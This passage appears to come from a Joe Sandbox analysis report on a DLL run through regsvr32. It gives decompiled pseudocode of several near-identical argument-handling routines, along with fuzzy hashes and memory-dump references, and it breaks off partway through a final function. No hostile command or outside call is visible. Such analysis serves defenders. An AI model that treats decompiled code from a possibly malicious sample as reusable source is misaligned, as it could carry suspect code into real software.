                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 297fc284718ad7ab641a2d59d0dd71d9095bd483a44845e479857f3b6debce92
                                                                      • Instruction ID: 2e0a0e64ab85830f150ad98f37876c3ded81cb9619ff8ca7ed46c870cdb4868a
                                                                      • Opcode Fuzzy Hash: 297fc284718ad7ab641a2d59d0dd71d9095bd483a44845e479857f3b6debce92
                                                                      • Instruction Fuzzy Hash: FF3181B6208B8885EB628F29D4413AD7BA0F39DF8CF158115EB4D0B751DF36C596CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118002578C(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800257b8;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((short*)(_t68 - 8));
                                                                      				goto 0x80025886;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800257f9;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((short*)(_t68 - 8)));
                                                                      				goto 0x80025888;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80025877;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80025833;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80025888;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8002582b;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((short*)(_t68 - 8)));
                                                                      				goto 0x8002582e;
                                                                      				 *_t72 =  *((short*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18002578c
                                                                      0x18002579d
                                                                      0x1800257a0
                                                                      0x1800257a2
                                                                      0x1800257a7
                                                                      0x1800257b0
                                                                      0x1800257b3
                                                                      0x1800257c2
                                                                      0x1800257c4
                                                                      0x1800257ca
                                                                      0x1800257cd
                                                                      0x1800257d2
                                                                      0x1800257d6
                                                                      0x1800257dd
                                                                      0x1800257e3
                                                                      0x1800257e8
                                                                      0x1800257ed
                                                                      0x1800257f4
                                                                      0x180025804
                                                                      0x180025806
                                                                      0x180025810
                                                                      0x180025814
                                                                      0x18002581c
                                                                      0x18002581e
                                                                      0x180025824
                                                                      0x180025828
                                                                      0x18002582b
                                                                      0x180025831
                                                                      0x180025833
                                                                      0x180025837
                                                                      0x18002583d
                                                                      0x180025847
                                                                      0x180025849
                                                                      0x18002584d
                                                                      0x180025850
                                                                      0x180025857
                                                                      0x18002585b
                                                                      0x180025862
                                                                      0x180025866
                                                                      0x18002586b
                                                                      0x180025870
                                                                      0x180025875
                                                                      0x180025883
                                                                      0x180025892

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 297fc284718ad7ab641a2d59d0dd71d9095bd483a44845e479857f3b6debce92
                                                                      • Instruction ID: 43e6392145b6a3e702850a86b3faaa1021622ee09b03e0e8d0ab77155e17020c
                                                                      • Opcode Fuzzy Hash: 297fc284718ad7ab641a2d59d0dd71d9095bd483a44845e479857f3b6debce92
                                                                      • Instruction Fuzzy Hash: 0331A172605B88C5EB668F29E4403AD7BA0E38DB8DF648115EB8C4B751CF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800237E4(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80023810;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x0000ffff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800238dd;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80023851;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x800238df;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800238cf;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8002388b;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x800238df;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E00000001180015A5C(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80023883;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80023886;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x1800237e4
                                                                      0x1800237e4
                                                                      0x1800237f5
                                                                      0x1800237f8
                                                                      0x1800237fa
                                                                      0x1800237ff
                                                                      0x180023803
                                                                      0x180023808
                                                                      0x18002380b
                                                                      0x18002381a
                                                                      0x18002381c
                                                                      0x180023822
                                                                      0x180023825
                                                                      0x18002382a
                                                                      0x18002382e
                                                                      0x180023835
                                                                      0x18002383b
                                                                      0x180023840
                                                                      0x180023845
                                                                      0x18002384c
                                                                      0x18002385c
                                                                      0x18002385e
                                                                      0x180023868
                                                                      0x18002386c
                                                                      0x180023874
                                                                      0x180023876
                                                                      0x18002387c
                                                                      0x180023880
                                                                      0x180023883
                                                                      0x180023889
                                                                      0x18002388b
                                                                      0x18002388f
                                                                      0x18002389f
                                                                      0x1800238a1
                                                                      0x1800238a5
                                                                      0x1800238a8
                                                                      0x1800238af
                                                                      0x1800238b3
                                                                      0x1800238ba
                                                                      0x1800238be
                                                                      0x1800238c3
                                                                      0x1800238c8
                                                                      0x1800238cd
                                                                      0x1800238da
                                                                      0x1800238e9

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4366e6c85a7ba8509948963b2a0b790dbd09b1954b718318cf5ee23181bb09c2
                                                                      • Instruction ID: a9756d909c47c449515e3782e0cf17984c5f1e818629cd43622af4b6ee648bad
                                                                      • Opcode Fuzzy Hash: 4366e6c85a7ba8509948963b2a0b790dbd09b1954b718318cf5ee23181bb09c2
                                                                      • Instruction Fuzzy Hash: 6231C472604B48C6EBA68F29E4413AD77A0F38DB8CF558115EB8D0B351DF36C596D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180025894(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800258c0;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x0000ffff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x8002598d;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80025901;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x8002598f;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8002597f;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8002593b;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x8002598f;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E0000000118000E818(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80025933;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80025936;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x180025894
                                                                      0x180025894
                                                                      0x1800258a5
                                                                      0x1800258a8
                                                                      0x1800258aa
                                                                      0x1800258af
                                                                      0x1800258b3
                                                                      0x1800258b8
                                                                      0x1800258bb
                                                                      0x1800258ca
                                                                      0x1800258cc
                                                                      0x1800258d2
                                                                      0x1800258d5
                                                                      0x1800258da
                                                                      0x1800258de
                                                                      0x1800258e5
                                                                      0x1800258eb
                                                                      0x1800258f0
                                                                      0x1800258f5
                                                                      0x1800258fc
                                                                      0x18002590c
                                                                      0x18002590e
                                                                      0x180025918
                                                                      0x18002591c
                                                                      0x180025924
                                                                      0x180025926
                                                                      0x18002592c
                                                                      0x180025930
                                                                      0x180025933
                                                                      0x180025939
                                                                      0x18002593b
                                                                      0x18002593f
                                                                      0x18002594f
                                                                      0x180025951
                                                                      0x180025955
                                                                      0x180025958
                                                                      0x18002595f
                                                                      0x180025963
                                                                      0x18002596a
                                                                      0x18002596e
                                                                      0x180025973
                                                                      0x180025978
                                                                      0x18002597d
                                                                      0x18002598a
                                                                      0x180025999

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4366e6c85a7ba8509948963b2a0b790dbd09b1954b718318cf5ee23181bb09c2
                                                                      • Instruction ID: 8956d1e39ae69145646b6f8f7fcd5758651d1a31e42b912e02806600c75da5a0
                                                                      • Opcode Fuzzy Hash: 4366e6c85a7ba8509948963b2a0b790dbd09b1954b718318cf5ee23181bb09c2
                                                                      • Instruction Fuzzy Hash: 4A31A172204784C6EB628F29D0403AD77A0E38DB9CF148115EBCD0B351CF36C596DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800238EC(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80023917;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x800239e4;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80023958;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x800239e6;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800239d6;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80023992;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800239e6;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8002398a;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8002398d;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x1800238ec
                                                                      0x1800238fd
                                                                      0x180023900
                                                                      0x180023902
                                                                      0x180023907
                                                                      0x18002390f
                                                                      0x180023912
                                                                      0x180023921
                                                                      0x180023923
                                                                      0x180023929
                                                                      0x18002392c
                                                                      0x180023931
                                                                      0x180023935
                                                                      0x18002393c
                                                                      0x180023942
                                                                      0x180023947
                                                                      0x18002394c
                                                                      0x180023953
                                                                      0x180023963
                                                                      0x180023965
                                                                      0x18002396f
                                                                      0x180023973
                                                                      0x18002397b
                                                                      0x18002397d
                                                                      0x180023983
                                                                      0x180023987
                                                                      0x18002398a
                                                                      0x180023990
                                                                      0x180023992
                                                                      0x180023996
                                                                      0x18002399c
                                                                      0x1800239a6
                                                                      0x1800239a8
                                                                      0x1800239ac
                                                                      0x1800239af
                                                                      0x1800239b6
                                                                      0x1800239ba
                                                                      0x1800239c1
                                                                      0x1800239c5
                                                                      0x1800239ca
                                                                      0x1800239cf
                                                                      0x1800239d4
                                                                      0x1800239e1
                                                                      0x1800239f0

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f26a35dd21e1a37991cdd2d73721424946dba8a8b8a6aec0a24c461e9538ddb
                                                                      • Instruction ID: c25e790eeb377c22076d01de10ab19cff93e03adbe8b4398147917ac83a8346b
                                                                      • Opcode Fuzzy Hash: 3f26a35dd21e1a37991cdd2d73721424946dba8a8b8a6aec0a24c461e9538ddb
                                                                      • Instruction Fuzzy Hash: 7731A472208B88C6EB628F29D0413AD77A0F39EB8CF658116DB8C0B355DF76C596C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118002599C(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800259c7;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80025a94;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80025a08;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80025a96;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80025a86;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80025a42;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80025a96;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80025a3a;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80025a3d;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x18002599c
                                                                      0x1800259ad
                                                                      0x1800259b0
                                                                      0x1800259b2
                                                                      0x1800259b7
                                                                      0x1800259bf
                                                                      0x1800259c2
                                                                      0x1800259d1
                                                                      0x1800259d3
                                                                      0x1800259d9
                                                                      0x1800259dc
                                                                      0x1800259e1
                                                                      0x1800259e5
                                                                      0x1800259ec
                                                                      0x1800259f2
                                                                      0x1800259f7
                                                                      0x1800259fc
                                                                      0x180025a03
                                                                      0x180025a13
                                                                      0x180025a15
                                                                      0x180025a1f
                                                                      0x180025a23
                                                                      0x180025a2b
                                                                      0x180025a2d
                                                                      0x180025a33
                                                                      0x180025a37
                                                                      0x180025a3a
                                                                      0x180025a40
                                                                      0x180025a42
                                                                      0x180025a46
                                                                      0x180025a4c
                                                                      0x180025a56
                                                                      0x180025a58
                                                                      0x180025a5c
                                                                      0x180025a5f
                                                                      0x180025a66
                                                                      0x180025a6a
                                                                      0x180025a71
                                                                      0x180025a75
                                                                      0x180025a7a
                                                                      0x180025a7f
                                                                      0x180025a84
                                                                      0x180025a91
                                                                      0x180025aa0

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f26a35dd21e1a37991cdd2d73721424946dba8a8b8a6aec0a24c461e9538ddb
                                                                      • Instruction ID: 77b7d7242c4987c483249710833b13c23bd94b2f7bd89cde0d6bd10a08edbcfe
                                                                      • Opcode Fuzzy Hash: 3f26a35dd21e1a37991cdd2d73721424946dba8a8b8a6aec0a24c461e9538ddb
                                                                      • Instruction Fuzzy Hash: 2A31A272204B94C6EB628F29D0813AD7BA0F39DB8DF258125EB8D0B351DF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800199DC(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
